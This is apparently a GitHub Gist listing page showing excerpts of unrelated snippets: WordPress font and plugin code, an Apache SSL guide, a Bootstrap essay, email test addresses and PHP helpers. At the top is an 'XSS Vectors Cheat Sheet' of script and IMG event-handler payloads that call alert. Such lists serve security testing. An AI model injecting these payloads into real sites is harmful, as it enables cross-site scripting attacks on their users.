Skip to content

Instantly share code, notes, and snippets.

View cheh's full-sized avatar

Dima Chekhovskyi cheh

View GitHub Profile
@kurobeats
kurobeats / xss_vectors.txt
Last active November 13, 2024 19:26
XSS Vectors Cheat Sheet
%253Cscript%253Ealert('XSS')%253C%252Fscript%253E
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onafterprint="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onbeforeprint="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onbeforeunload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onhashchange="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onmessage="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x ononline="alert(String.fromCharCode(88,83,83))">
@vm6ej04
vm6ej04 / Force browser reload on back or forward button click. *back-forward cache
Last active March 12, 2024 09:13
Force reload when click back/ forward button on iOS/ prevent button state stuck, etc. *back-forward cache
window.onpageshow = function(event) {
if (event.persisted) {
window.location.reload()
}
};
//JQUERY
$(window).bind("pageshow", function(event) {
if (event.originalEvent.persisted) {
window.location.reload()
@justintadlock
justintadlock / fonts.php
Last active July 13, 2016 15:15
Enqueue fonts in WP
<?php
/**
* Functions for handling font enqueueing, registration, etc. This works with the
* Google Fonts API.
*
* Extending an idea from Jose Castaneda. This is a small script for loading Google fonts
* with an easy method for adding/removing/editing the fonts loaded via child theme.
*
* @link http://blog.josemcastaneda.com/2016/02/29/adding-removing-fonts-from-a-theme/
*/
@nrollr
nrollr / ApacheHTTPSConfig.md
Last active November 13, 2024 10:41
Enable SSL in Apache for 'localhost' (OSX, El Capitan)

Enable SSL in Apache (OSX)

The following will guide you through the process of enabling SSL on a Apache webserver

  • The instructions have been verified with OSX El Capitan (10.11.2) running Apache 2.4.16
  • The instructions assume you already have a basic Apache configuration enabled on OSX, if this is not the case feel free to consult Gist: "Enable Apache HTTP server (OSX)"

Apache SSL Configuration

Create a directory within /etc/apache2/ using Terminal.app: sudo mkdir /etc/apache2/ssl
Next, generate two host keys:

@iAdramelk
iAdramelk / .md
Last active June 4, 2024 05:34
Длинная телега про Бутстрап

Английская версия: https://evilmartians.com/chronicles/bootstrap-an-intervention

Вводная часть

У CSS есть несколько базовых проблем, которые позволяют очень быстро отстрелить себе ногу при неправильном использовании:

  1. Глобальный неймспейс – в серверном программировании все что написано в файле, в файле и остается. Все же что написано в css и js засирает глобальное пространство имен со всеми вытекающими. В JS эту проблему сейчас побороли всякими модульными системами, а вот с css сложнее. В идеальном мире это должен починить Shadow DOM и настоящие Web Components, но пока их нет единственный способ с этим бороться – следовать какой-то системе именований селекторов, которая по возможности уменьшает и исключает возможные конфликты.

  2. Каскадность – если на один элемент может сработать несколько правил, то они все и сработают последовательно. Если есть элемент h1.title, на него сработают все правила для тегов h1 и все правила для класса .title. Так как весь html состоит из тегов, то правил которые п

@cjaoude
cjaoude / gist:fd9910626629b53c4d25
Last active November 14, 2024 02:17
Test list of Valid and Invalid Email addresses
Use: for testing against email regex
ref: http://codefool.tumblr.com/post/15288874550/list-of-valid-and-invalid-email-addresses
List of Valid Email Addresses
[email protected]
[email protected]
[email protected]
[email protected]
@chriscoyier
chriscoyier / frontendplugins.md
Last active March 3, 2021 17:31
How WordPress Plugins Should Handle Front End Resources

How WordPress Plugins Should Handle Front End Resources

This is a WORK IN PROGRESS intended for fleshing out and feedback

It's very common for people to be unhappy with how a WordPress plugin adds front end resources to their site. If a plugin needs CSS, the plugin will add a <link> element to that CSS. If the plugin needs JavaScript, it will add a <script> to that JavaScript.

Plugins do this because it works. It's damn important for a WordPress plugin to work, even in adverse conditions. They rightfully want good ratings and little customer support.

But this comes at the cost of additional HTTP requests. In optimizing front end performance of a site, reducing the number of HTTP requests is a huge thing. Front end developers want to decide and control how front end resources are being handled, and WordPress plugins don't typically make this easy on them.

<?php
function set_custom_dashicon() {
?>
<style type="text/css">
#menu-posts-{post_type} .wp-menu-image:before {
content: '\f174';
}
</style>
<?php
@LucaRosaldi
LucaRosaldi / get-browser-language-code.php
Last active February 24, 2022 10:13
PHP: Get Browser Language, optionally passing a list of available languages.
<?php
/**
* Get browser language, optionally passing a list of available languages.
*
* @param [array] $available_languages Available languages for the site
* @param [string] $default Default language for the site
* @return [string] Language code
*/
function get_browser_language_code( $available_languages = [], $default = 'en' ) : string
{
@cosmocatalano
cosmocatalano / instagram_scrape.php
Last active November 4, 2024 17:16
Quick-and-dirty Instagram web scrape, just in case you don't think you should have to make your users log in to deliver them public photos.
<?php
//returns a big old hunk of JSON from a non-private IG account page.
function scrape_insta($username) {
$insta_source = file_get_contents('http://instagram.com/'.$username);
$shards = explode('window._sharedData = ', $insta_source);
$insta_json = explode(';</script>', $shards[1]);
$insta_array = json_decode($insta_json[0], TRUE);
return $insta_array;
}